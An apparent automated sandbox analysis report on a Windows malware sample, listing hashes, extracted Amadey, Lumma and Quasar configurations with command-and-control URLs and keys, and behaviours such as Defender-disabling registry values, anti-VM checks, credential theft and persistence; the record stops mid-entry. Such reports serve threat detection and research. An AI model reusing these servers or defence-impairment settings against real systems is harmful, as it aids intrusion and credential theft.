Analysis
-
max time kernel
139s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 09:03
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win10v2004-20250313-en
General
-
Target
file.exe
-
Size
4.0MB
-
MD5
f3763e99a52366b1ff590fbdb7623389
-
SHA1
48569bd856d8563286f28857e3040fbd5b418366
-
SHA256
7d192dbab41057537f86fffa7300579e5f55175914497d8c144790b01af50f6e
-
SHA512
088a7a16cfbaccddfcff7ab4ccb8ac417a636a2418e9a84efabe6a805560ce976b22f9eea0a22e41584679d42ea4e296434d12cba069e3db57c9e56431d01621
-
SSDEEP
98304:8Umh+C2WK798Nlw0UXrAnR9qvwV/IiN/H1E2Q7voBO5+cmEgakj:+098LuroR9tnH1E2Q7IOWnakj
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://1ironloxp.live/aksdd
https://starcloc.bet/GOksAo
https://vspacedbv.world/EKdlsk
https://orodformi.run/aUosoz
https://6targett.top/dsANGt
https://hcosmosyf.top/GOsznj
https://hywnnavstarx.shop/FoaJSi
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/1528-1188-0x0000000000410000-0x0000000000888000-memory.dmp healer behavioral1/memory/1528-1189-0x0000000000410000-0x0000000000888000-memory.dmp healer behavioral1/memory/1528-1569-0x0000000000410000-0x0000000000888000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 58424ecd61.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 58424ecd61.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 58424ecd61.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 58424ecd61.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 58424ecd61.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 58424ecd61.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 58424ecd61.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 58424ecd61.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 58424ecd61.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 58424ecd61.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/memory/3992-137-0x000000000D0F0000-0x000000000D244000-memory.dmp family_quasar behavioral1/memory/3992-138-0x000000000D270000-0x000000000D28A000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 10912 created 2760 10912 MSBuild.exe 49 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 44cdc87f9e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1r83R6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2h3853.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a1c5de4625.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 58424ecd61.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 47 3992 powershell.exe 185 3992 powershell.exe 318 3992 powershell.exe 369 3992 powershell.exe 448 3992 powershell.exe -
pid Process 4604 powershell.exe 2180 powershell.exe 2928 powershell.exe 1696 powershell.exe 6320 powershell.exe 2748 powershell.exe 5828 powershell.exe 13272 powershell.exe 12920 powershell.exe 3992 powershell.exe 11760 powershell.exe 6848 powershell.exe 3324 powershell.exe 8664 powershell.exe 8772 powershell.exe 4952 powershell.exe 5476 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 16 IoCs
flow pid Process 50 728 rapes.exe 50 728 rapes.exe 50 728 rapes.exe 50 728 rapes.exe 50 728 rapes.exe 327 4652 svchost.exe 386 728 rapes.exe 457 728 rapes.exe 457 728 rapes.exe 457 728 rapes.exe 307 728 rapes.exe 331 728 rapes.exe 395 728 rapes.exe 44 728 rapes.exe 319 728 rapes.exe 33 728 rapes.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\367f83e6.sys c6570e3e.exe File created C:\Windows\System32\Drivers\klupd_367f83e6a_arkmon.sys c6570e3e.exe File created C:\Windows\System32\Drivers\klupd_367f83e6a_klbg.sys c6570e3e.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 5232 netsh.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 3472 icacls.exe 7548 takeown.exe -
Sets service image path in registry 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\CD7Q57q_7840\ImagePath = "\\??\\C:\\Windows\\Temp\\sbkf8KFL_7840.sys" tzutil.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\367f83e6\ImagePath = "System32\\Drivers\\367f83e6.sys" c6570e3e.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_arkmon\ImagePath = "System32\\Drivers\\klupd_367f83e6a_arkmon.sys" c6570e3e.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_klbg\ImagePath = "System32\\Drivers\\klupd_367f83e6a_klbg.sys" c6570e3e.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_klark\ImagePath = "System32\\Drivers\\klupd_367f83e6a_klark.sys" c6570e3e.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_mark\ImagePath = "System32\\Drivers\\klupd_367f83e6a_mark.sys" c6570e3e.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_367f83e6a_arkmon.sys" c6570e3e.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 6056 msedge.exe 6416 msedge.exe 6504 msedge.exe 5632 chrome.exe 4500 chrome.exe 1676 chrome.exe 2276 chrome.exe 3656 msedge.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 58424ecd61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 58424ecd61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2h3853.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a1c5de4625.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5e4bf76d9c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 44cdc87f9e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 44cdc87f9e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1r83R6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5e4bf76d9c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2h3853.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a1c5de4625.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1r83R6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation 1r83R6.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Deletes itself 1 IoCs
pid Process 8032 w32tm.exe -
Drops startup file 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8411822f.cmd powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f0382b.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f0382b.cmd powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8411822f.cmd powershell.exe -
Executes dropped EXE 30 IoCs
pid Process 5448 e9T61.exe 2808 1r83R6.exe 728 rapes.exe 4564 2h3853.exe 2376 YGYZCmt.exe 3420 captcha.exe 5320 a1c5de4625.exe 3320 rapes.exe 2984 5e4bf76d9c.exe 4160 b6c719608f.exe 1528 58424ecd61.exe 7276 8938ff0d0d.exe 7480 8e5094a924.exe 4628 YGYZCmt.exe 220 Rm3cVPI.exe 5716 p3hx1_003.exe 7840 tzutil.exe 8032 w32tm.exe 7228 rapes.exe 7044 qWR3lUj.exe 4748 apple.exe 7756 261.exe 7288 261.exe 10844 TbV75ZR.exe 6456 43a434f6.exe 12888 c6570e3e.exe 7432 44cdc87f9e.exe 12216 captcha.exe 8508 7IIl2eE.exe 10760 XOPPRUc.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine a1c5de4625.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine 58424ecd61.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine 44cdc87f9e.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine 1r83R6.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine 2h3853.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\367f83e6.sys c6570e3e.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\367f83e6.sys\ = "Driver" c6570e3e.exe -
Loads dropped DLL 25 IoCs
pid Process 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe 12888 c6570e3e.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 7548 takeown.exe 3472 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 58424ecd61.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 58424ecd61.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\58424ecd61.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416770101\\58424ecd61.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\42bdb713-0053-4a10-9bb0-c040d5ebd6b9 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{6de22b4c-aeec-4d5a-ae91-5a30501945f4}\\42bdb713-0053-4a10-9bb0-c040d5ebd6b9.cmd\"" c6570e3e.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" file.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" e9T61.exe Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a1c5de4625.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416740101\\a1c5de4625.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e4bf76d9c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416750101\\5e4bf76d9c.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b6c719608f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416760101\\b6c719608f.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 3 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: captcha.exe File opened (read-only) \??\F: c6570e3e.exe File opened (read-only) \??\F: captcha.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 c6570e3e.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00050000000235e4-367.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 38 IoCs
pid Process 7000 tasklist.exe 5368 tasklist.exe 2072 tasklist.exe 6828 tasklist.exe 9688 tasklist.exe 6048 tasklist.exe 2652 tasklist.exe 4688 tasklist.exe 3168 tasklist.exe 11416 tasklist.exe 11808 tasklist.exe 12940 tasklist.exe 2172 tasklist.exe 4532 tasklist.exe 8348 tasklist.exe 9172 tasklist.exe 12724 tasklist.exe 4432 tasklist.exe 5628 tasklist.exe 8608 tasklist.exe 10972 tasklist.exe 5456 tasklist.exe 5128 tasklist.exe 7664 tasklist.exe 2652 tasklist.exe 4256 tasklist.exe 624 tasklist.exe 5780 tasklist.exe 3084 tasklist.exe 6368 tasklist.exe 11284 tasklist.exe 5344 tasklist.exe 4540 tasklist.exe 2620 tasklist.exe 8320 tasklist.exe 3516 tasklist.exe 11644 tasklist.exe 6772 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 2808 1r83R6.exe 728 rapes.exe 4564 2h3853.exe 5320 a1c5de4625.exe 3320 rapes.exe 1528 58424ecd61.exe 7228 rapes.exe 7432 44cdc87f9e.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2376 set thread context of 4292 2376 YGYZCmt.exe 107 PID 7276 set thread context of 7336 7276 8938ff0d0d.exe 315 PID 4628 set thread context of 5460 4628 YGYZCmt.exe 324 PID 7044 set thread context of 5856 7044 qWR3lUj.exe 447 PID 10844 set thread context of 10912 10844 TbV75ZR.exe 520 PID 10760 set thread context of 10796 10760 XOPPRUc.exe 587 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 43a434f6.exe File opened (read-only) \??\VBoxMiniRdrDN c6570e3e.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job 1r83R6.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 3 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 5476 powershell.exe 3324 powershell.exe 8772 powershell.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 6036 sc.exe 7336 sc.exe 4576 sc.exe 5176 sc.exe 9736 sc.exe 4152 sc.exe 5828 sc.exe 9088 sc.exe 9148 sc.exe 9296 sc.exe 9360 sc.exe 9392 sc.exe 5044 sc.exe 696 sc.exe 9452 sc.exe 2652 sc.exe 3964 sc.exe 7492 sc.exe 5368 sc.exe 8680 sc.exe 9196 sc.exe 9496 sc.exe 9584 sc.exe 8868 sc.exe 6408 sc.exe 8752 sc.exe 5956 sc.exe 7280 sc.exe 988 sc.exe 8784 sc.exe 9256 sc.exe 9632 sc.exe 7920 sc.exe 8224 sc.exe 8848 sc.exe 8928 sc.exe 8976 sc.exe 9044 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 5 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh c6570e3e.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh c6570e3e.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 11452 10912 WerFault.exe 520 -
System Location Discovery: System Language Discovery 1 TTPs 41 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8e5094a924.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language p3hx1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 44cdc87f9e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e9T61.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1r83R6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a1c5de4625.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language b6c719608f.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage b6c719608f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c6570e3e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 58424ecd61.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 43a434f6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2h3853.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b6c719608f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 28 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened 